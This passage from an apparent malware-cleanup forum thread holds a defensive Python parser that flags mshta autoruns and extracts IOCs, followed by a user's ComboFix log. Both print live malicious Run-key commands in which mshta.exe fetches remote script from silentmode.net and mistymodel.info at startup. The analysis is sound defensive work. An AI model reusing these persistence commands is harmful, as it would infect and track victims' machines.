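VALUE_RE = re.compile(r'^\s*"(?P<name>[^"]+)"\s*=\s*"(?P<cmd>[^"]*)"')
TRAILER_RE = re.compile(r"\s*\[[^\]]*\]\s*$")        # trailing [?], [X], [date size]
BIN_RE = re.compile(r"(\w[\w.-]*\.exe)\b", re.IGNORECASE)
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)

# Constructed sample, modelled on the "Reg Loading Points" section of this
# thread's ComboFix log (same hosts and victim id as the log).
SAMPLE_DUMP = r"""
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1" [?]
"RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP" [?]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
mshta.exe http://mistymodel.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP [?]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
mshta [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
"""


@dataclass
class Finding:
    key: str              # registry key the value lives under
    name: str             # value name (last key segment for msconfig entries)
    binary: str           # launcher extracted from the command line
    url: Optional[str]
    host: Optional[str]
    cccid: Optional[str]  # per-victim id carried in the URL query string
    severity: str         # "high" = launcher + remote URL, "review" = launcher alone


def _launcher(cmd: str) -> str:
    """Name of the executable a command line starts, lower-cased."""
    m = BIN_RE.search(cmd)
    if m:
        return m.group(1).lower()
    parts = cmd.split()
    return parts[0].lower() if parts else ""


def parse_autoruns(text: str) -> List[Finding]:
    """Scan a ComboFix-style registry dump for script-host autoruns."""
    findings: List[Finding] = []
    key: Optional[str] = None
    for raw in text.splitlines():
        km = KEY_RE.match(raw)
        if km:
            key = km.group("key")
            continue
        if key is None:
            continue                          # header lines before the first key
        vm = VALUE_RE.match(raw)
        if vm:
            name, cmd = vm.group("name"), vm.group("cmd")
        else:
            # msconfig\startupreg entries print the bare command under the key
            name, cmd = key.rsplit("\\", 1)[-1], TRAILER_RE.sub("", raw).strip()
        binary = _launcher(cmd)
        if binary not in REMOTE_CAPABLE_LOLBINS:
            continue
        um = URL_RE.search(cmd)
        url = um.group(0) if um else None
        host = cccid = None
        if url:
            parsed = urlparse(url)
            host = parsed.hostname
            cccid = parse_qs(parsed.query).get("cccid", [None])[0]
        findings.append(Finding(key, name, binary, url, host, cccid,
                                "high" if url else "review"))
    return findings


def collect_iocs(findings: List[Finding]) -> dict:
    """Hosts to block and victim ids to pivot on, de-duplicated and sorted."""
    return {
        "hosts": sorted({f.host for f in findings if f.host}),
        "cccids": sorted({f.cccid for f in findings if f.cccid}),
    }


if __name__ == "__main__":
    found = parse_autoruns(SAMPLE_DUMP)
    for f in found:
        print(f"[{f.severity}] {f.name}: {f.binary} -> {f.host or '(no URL)'}")
    print(collect_iocs(found))
```

The returned hosts are what you would block at the proxy, and the cccid is a handy pivot when checking other machines. Note that the value names are a fixed prefix plus the victim id, so a detection keyed on an exact value name would miss every other infection; matching on the launcher plus a URL, as above, does not.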
     
  9. gagraptor

    gagraptor Thread Starter

    Joined:
    May 23, 2012
    Messages:
    31
    ComboFix 12-05-28.05 - GAGAN 05/28/2012 22:36:29.1.2 - x86
    Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1917.999 [GMT -4:00]
    Running from: c:\users\GAGAN\Downloads\ComboFix.exe
    AV: Microsoft Security Essentials *Disabled/Updated* {9765EA51-0D3C-7DFB-6091-10E4E1F341F6}
    SP: Microsoft Security Essentials *Disabled/Updated* {2C040BB5-2B06-7275-5A21-2B969A740B4B}
    SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    .
    .
    ((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    c:\programdata\xp
    c:\programdata\xp\EBLib.dll
    c:\programdata\xp\TPwSav.sys
    c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}
    c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome.manifest
    c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\chrome\content\overlay.xul
    c:\users\GAGAN\AppData\Local\{80B48C37-52A6-49F9-808B-ECAA2F5588E9}\install.rdf
    c:\windows\system32\CTF
    c:\windows\system32\CTF\ctfmon.txt
    c:\windows\system32\CTF\Links\OtherProducts.html
    .
    .
    ((((((((((((((((((((((((( Files Created from 2012-04-28 to 2012-05-29 )))))))))))))))))))))))))))))))
    .
    .
    2012-05-28 05:06 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A66FBB99-C8AC-44BC-83F6-4037B1F477F7}\mpengine.dll
    2012-05-23 20:07 . 2012-05-08 13:40 6737808 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
    2012-05-22 05:16 . 2012-05-22 05:16 713784 ------w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{F78CEF23-EB95-4DED-8458-48E319614326}\gapaengine.dll
    2012-05-22 05:09 . 2012-05-22 05:10 -------- d-----w- c:\program files\Microsoft Security Client
    2012-05-19 08:37 . 2012-05-08 16:40 6737808 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{3070EC37-30CA-43AE-AC15-BBE0716A8AAD}\mpengine.dll
    2012-05-19 05:43 . 2012-05-19 09:50 -------- d-----w- c:\programdata\vsint
    2012-05-14 22:57 . 2012-03-20 23:28 53120 ----a-w- c:\windows\system32\drivers\partmgr.sys
    2012-05-14 22:57 . 2012-03-30 12:39 914304 ----a-w- c:\windows\system32\drivers\tcpip.sys
    2012-05-14 22:57 . 2012-03-29 13:39 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
    2012-05-14 22:57 . 2012-02-01 15:10 1404928 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\InkObj.dll
    2012-05-14 22:57 . 2012-02-01 15:10 936960 ----a-w- c:\program files\Common Files\Microsoft Shared\ink\journal.dll
    2012-05-14 22:57 . 2012-02-29 13:41 1069056 ----a-w- c:\windows\system32\DWrite.dll
    2012-05-14 22:57 . 2012-03-01 14:46 219648 ----a-w- c:\windows\system32\d3d10_1core.dll
    2012-05-14 22:57 . 2012-02-29 14:08 1172480 ----a-w- c:\windows\system32\d3d10warp.dll
    2012-05-14 22:57 . 2012-03-01 14:46 160768 ----a-w- c:\windows\system32\d3d10_1.dll
    2012-05-14 22:57 . 2012-02-29 13:44 683008 ----a-w- c:\windows\system32\d2d1.dll
    2012-05-14 22:56 . 2012-04-03 08:16 3550080 ----a-w- c:\windows\system32\ntoskrnl.exe
    2012-05-14 22:56 . 2012-04-03 08:16 3602816 ----a-w- c:\windows\system32\ntkrnlpa.exe
    2012-05-14 22:56 . 2012-04-02 13:36 2044928 ----a-w- c:\windows\system32\win32k.sys
    2012-05-09 04:58 . 2012-05-09 04:58 592824 ----a-w- c:\program files\Mozilla Firefox\gkmedias.dll
    2012-05-09 04:58 . 2012-05-09 04:58 44472 ----a-w- c:\program files\Mozilla Firefox\mozglue.dll
    .
    .
    .
    (((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2012-05-05 06:08 . 2012-04-07 05:22 419488 ----a-w- c:\windows\system32\FlashPlayerApp.exe
    2012-05-05 06:08 . 2011-06-14 22:11 70304 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
    2012-04-04 19:56 . 2010-02-20 07:40 22344 ----a-w- c:\windows\system32\drivers\mbam.sys
    2012-03-21 00:44 . 2012-03-21 00:44 74112 ----a-w- c:\windows\system32\drivers\NisDrvWFP.sys
    2012-03-21 00:44 . 2012-03-21 00:44 171064 ----a-w- c:\windows\system32\drivers\MpFilter.sys
    2012-02-29 15:11 . 2012-04-14 06:43 5120 ----a-w- c:\windows\system32\wmi.dll
    2012-02-29 15:11 . 2012-04-14 06:43 172032 ----a-w- c:\windows\system32\wintrust.dll
    2012-02-29 15:09 . 2012-04-14 06:43 157696 ----a-w- c:\windows\system32\imagehlp.dll
    2012-02-29 13:32 . 2012-04-14 06:43 12800 ----a-w- c:\windows\system32\drivers\fs_rec.sys
    2012-05-09 04:58 . 2011-06-08 03:45 97208 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
    .
    .
    ((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* empty entries & legit default entries are not shown
    REGEDIT4
    .
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\URLSearchHooks]
    "{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{e9df9360-97f8-4690-afe6-996c80790da4}]
    2011-05-09 08:49 176936 ----a-w- c:\program files\uTorrentControl\prxtbuTor.dll
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
    "{e9df9360-97f8-4690-afe6-996c80790da4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Webbrowser]
    "{E9DF9360-97F8-4690-AFE6-996C80790DA4}"= "c:\program files\uTorrentControl\prxtbuTor.dll" [2011-05-09 176936]
    .
    [HKEY_CLASSES_ROOT\clsid\{e9df9360-97f8-4690-afe6-996c80790da4}]
    .
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1" [?]
    "RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP"="mshta.exe http://silentmode.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP" [?]
    "Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-04-11 1233920]
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "RtHDVCpl"="RtHDVCpl.exe" [2007-06-13 4489216]
    "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2006-09-11 180224]
    "Skytel"="Skytel.exe" [2007-05-29 1826816]
    "Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-10-15 39792]
    "00TCrdMain"="c:\program files\TOSHIBA\FlashCards\TCrdMain.exe" [2007-04-27 538744]
    "SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-03-20 1451304]
    "QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2011-10-24 421888]
    "TkBellExe"="c:\program files\real\realplayer\Update\realsched.exe" [2011-12-01 296056]
    "DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-07-28 1259376]
    "SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
    "APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2012-02-21 59240]
    "iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2012-03-27 421736]
    "MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2012-03-26 931200]
    .
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
    "Picasa Media Detector"="c:\program files\Picasa2\PicasaMediaDetector.exe" [2007-10-23 443968]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
    "EnableUIADesktopToggle"= 0 (0x0)
    "EnableLinkedConnections"= 1 (0x1)
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
    "aux1"=wdmaud.drv
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
    @="Service"
    .
    [HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Metacafe.lnk]
    path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
    backup=c:\windows\pss\Metacafe.lnk.CommonStartup
    backupExtension=.CommonStartup
    .
    [HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk]
    path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk
    backup=c:\windows\pss\Microsoft Office.lnk.CommonStartup
    backupExtension=.CommonStartup
    .
    [HKLM\~\startupfolder\C:^Users^GAGAN^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk]
    path=c:\users\GAGAN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    backup=c:\windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
    backupExtension=.Startup
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
    mshta.exe http://mistymodel.info/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP [?]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP]
    mshta.exe http://mistymodel.info/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 [?]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HWSetup]
    \HWSetup.exe hwSetUP [X]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\webvsint]
    mshta [X]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Akamai NetSession Interface]
    2011-12-13 04:20 3305760 ----a-w- c:\users\GAGAN\AppData\Local\Akamai\netsession_win.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\APSDaemon]
    2012-02-21 01:28 59240 ----a-w- c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Camera Assistant Software]
    2007-04-10 23:40 413696 ----a-w- c:\program files\Camera Assistant Software for Toshiba\traybar.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtamon]
    2010-02-10 12:39 16040 ----a-w- c:\program files\Dell V305\dldtamon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\dldtmon.exe]
    2010-02-10 12:39 672424 ----a-w- c:\program files\Dell V305\dldtmon.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\EPSON WorkForce 30 Series]
    2007-11-26 21:00 188928 ----a-w- c:\windows\System32\spool\drivers\w32x86\3\E_FATIEEA.EXE
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\googletalk]
    2007-01-01 21:22 3739648 ----a-w- c:\users\GAGAN\AppData\Roaming\Google\Google Talk\googletalk.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HSON]
    2006-12-07 23:49 55416 ----a-w- c:\program files\Toshiba\TBS\HSON.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
    2012-03-27 09:09 421736 ----a-w- c:\program files\iTunes\iTunesHelper.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KeNotify]
    2006-11-07 00:14 34352 ----a-w- c:\program files\Toshiba\Utilities\KeNotify.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NBAgent]
    2009-06-18 07:08 1062184 ----a-w- c:\program files\Nero\Nero BackItUp & Burn\Nero BackItUp\NBAgent.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Pando Media Booster]
    2009-02-27 06:22 2785608 ----a-w- c:\program files\Pando Networks\Media Booster\PMB.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
    2011-10-24 19:28 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RtHDVCpl]
    2007-06-13 17:11 4489216 ----a-w- c:\windows\RtHDVCpl.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skytel]
    2007-05-29 00:39 1826816 ----a-w- c:\windows\SkyTel.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SmoothView]
    2007-03-22 18:46 448632 ----a-w- c:\program files\Toshiba\SmoothView\SmoothView.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Speech Recognition]
    2008-01-19 07:33 49664 ----a-w- c:\windows\Speech\Common\sapisvr.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\StartCCC]
    2006-11-10 16:35 90112 ----a-w- c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SVPWUTIL]
    2006-03-23 04:42 438272 ----a-w- c:\program files\Toshiba\Utilities\SVPWUTIL.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SynTPEnh]
    2009-03-20 11:36 1451304 ----a-w- c:\program files\Synaptics\SynTP\SynTPEnh.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TPwrMain]
    2007-03-29 17:39 411192 ----a-w- c:\program files\Toshiba\Power Saver\TPwrMain.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VeohPlugin]
    2011-06-30 10:11 2648184 ----a-w- c:\program files\Veoh Networks\VeohWebPlayer\veohwebplayer.exe
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
    "DisableMonitoring"=dword:00000001
    .
    R3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-05-05 257696]
    .
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
    LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
    .
    Contents of the 'Scheduled Tasks' folder
    .
    2012-05-28 c:\windows\Tasks\Adobe Flash Player Updater.job
    - c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-07 06:08]
    .
    2012-05-28 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000Core.job
    - c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
    .
    2012-05-29 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-822561583-4103383742-3251873995-1000UA.job
    - c:\users\GAGAN\AppData\Local\Google\Update\GoogleUpdate.exe [2008-11-12 22:14]
    .
    2011-01-29 c:\windows\Tasks\User_Feed_Synchronization-{EA4C49AC-05D5-4334-B956-853DDFB08609}.job
    - c:\windows\system32\msfeedssync.exe [2012-04-12 08:09]
    .
    .
    ------- Supplementary Scan -------
    .
    uStart Page = hxxp://search.imesh.com/
    mStart Page = hxxp://home.sweetim.com
    mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
    uInternet Settings,ProxyOverride = *.local
    LSP: c:\windows\system32\wpclsp.dll
    TCP: DhcpNameServer = 192.168.1.1
    FF - ProfilePath - c:\users\GAGAN\AppData\Roaming\Mozilla\Firefox\Profiles\bav5d5wt.default\
    FF - prefs.js: browser.search.selectedEngine - GoogIe
    FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
    FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
    FF - user.js: browser.search.selectedEngine - GoogIe
    FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
    FF - user.js: yahoo.homepage.dontask - true
    .
    - - - - ORPHANS REMOVED - - - -
    .
    WebBrowser-{EEE6C35B-6118-11DC-9C72-001320C79847} - (no file)
    WebBrowser-{CCC7A320-B3CA-4199-B1A6-9F516DD69829} - (no file)
    MSConfigStartUp-BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA} - c:\program files\Common Files\Nero\Lib\NMBgMonitor.exe
    MSConfigStartUp-CTFMon - c:\windows\system32\CTF\ctfmon.exe
    MSConfigStartUp-fcconf - c:\users\GAGAN\AppData\Local\Temp\dns-hone.dll
    MSConfigStartUp-InCD - c:\program files\Nero\Nero8\InCD\InCD.exe
    MSConfigStartUp-NDSTray - NDSTray.exe
    MSConfigStartUp-NeroFilterCheck - c:\program files\Common Files\Nero\Lib\NeroCheck.exe
    MSConfigStartUp-SecurDisc - c:\program files\Nero\Nero8\InCD\NBHGui.exe
    MSConfigStartUp-SiteAdvisor - c:\program files\SiteAdvisor\6172\SiteAdv.exe
    MSConfigStartUp-Swusukukasega - c:\users\GAGAN\AppData\Local\ocopodatodejex.dll
    MSConfigStartUp-TkBellExe - c:\program files\Common Files\Real\Update_OB\realsched.exe
    MSConfigStartUp-YSearchProtection - c:\program files\Yahoo!\Search Protection\SearchProtection.exe
    AddRemove-Akamai - c:\program files\common files\akamai\uninstall.exe
    AddRemove-WinImage - c:\users\GAGAN\Desktop\winima81\winimage.exe
    .
    .
    .
    **************************************************************************
    .
    catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
    Rootkit scan 2012-05-28 22:49
    Windows 6.0.6002 Service Pack 2 NTFS
    .
    scanning hidden processes ...
    .
    scanning hidden autostart entries ...
    .
    scanning hidden files ...
    .
    scan completed successfully
    hidden files: 0
    .
    **************************************************************************
    .
    --------------------- LOCKED REGISTRY KEYS ---------------------
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aifc\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aiff\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.au\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.flac\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.m3u\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.midi\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mp3\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.ogg\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pcm\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pls\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.spx\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wav\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\UserChoice]
    @Denied: (2) (LocalSystem)
    "Progid"="YMP.Media"
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow]
    @Denied: (Read) (RestrictedCode)
    @Denied: (Read) (LocalSystem)
    @Denied: (Read) (S-1-5-21-822561583-4103383742-3251873995-1000)
    @Denied: (Read) (Administrators)
    @SACL=(02 0001)
    @Ace=(0x11) (1) (S-1-16-4096)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Aurigma]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Conduit]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Unity]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\uTorrentControl]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\bookmarks]
    @SACL=(02 0001)
    "lastact"=dword:00003640
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\ButtonHistory]
    @SACL=(02 0001)
    "srch_ebox"=dword:4785b178
    "srch_hlt"=dword:47854ece
    "clkstrm"=dword:4785b2dc
    "boo"=dword:4785b2dc
    "etpg70_21"=dword:47854ece
    "sst"=dword:47854ecf
    "mess"=dword:4785b2dc
    "mess_off"=dword:4785b2dc
    "yma"=dword:47854eda
    "mus"=dword:47854edb
    "wik"=dword:47854edb
    "vis_srch70"=dword:4785abea
    "cacheldr"=dword:4785b2dc
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\!guest\URLHistory]
    @SACL=(02 0001)
    "srch"=dword:4785abec
    "vis_srch70"=dword:4785abec
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\Profiles\simi_zenith05]
    @SACL=(02 0001)
    "LastPoll_200"=dword:00041537
    "resfeed"=dword:00000002
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\AppDataLow\Software\Yahoo\Companion\SearchHistory]
    @SACL=(02 0001)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\CDDB]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
    @Denied: (Full) (S-1-5-21-822561583-4103383742-3251873995-1000)
    .
    [HKEY_USERS\S-1-5-21-822561583-4103383742-3251873995-1000\Software\ej-technologies]
    @Denied: (Full) (RestrictedCode)
    @Denied: (Full) (LocalSystem)
